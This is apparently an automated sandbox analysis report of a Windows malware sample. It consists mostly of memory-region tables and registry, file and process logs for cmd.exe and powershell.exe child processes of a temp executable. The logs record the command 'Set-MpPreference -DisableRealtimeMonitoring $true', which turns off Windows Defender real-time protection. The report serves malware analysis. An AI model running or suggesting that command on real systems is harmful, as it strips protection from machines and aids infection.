|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00947fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x01edffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ee0000 | 0x01ee0000 | 0x02222fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02230000 | 0x024fefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x7d4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 162927 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #8: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:44, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Self Terminated |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x900 |
| Parent PID | 0x8bc (c:\users\aetadzjz\appdata\local\temp\fulezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x00256fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d40000 | 0x01d40000 | 0x02082fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02090000 | 0x0235efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x320, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 162927 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: powershell.exe
787
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:45, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:49 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x320 |
| Parent PID | 0x900 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
114
0x
580
0x
938
0x
8D4
0x
C8
0x
8C4
0x
ACC
0x
AD0
0x
554
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00130000 | 0x00132fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00270000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x00280000 | 0x0029ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x002b0000 | 0x002dffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x003e0000 | 0x003e3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00480fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00490fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01bd0000 | 0x01c35fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01c4ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c50000 | 0x01c50000 | 0x01c5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c8ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01c9ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01cbffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01ccffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01cd0000 | 0x01cd2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d20000 | 0x01d20000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d60fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01d70000 | 0x01d74fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dbffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001dc0000 | 0x01dc0000 | 0x01e9efff | Pagefile Backed Memory | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01ea0000 | 0x01ea7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001eb0000 | 0x01eb0000 | 0x01eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x01f8ffff | Private Memory | rw |
|
|
|
- |
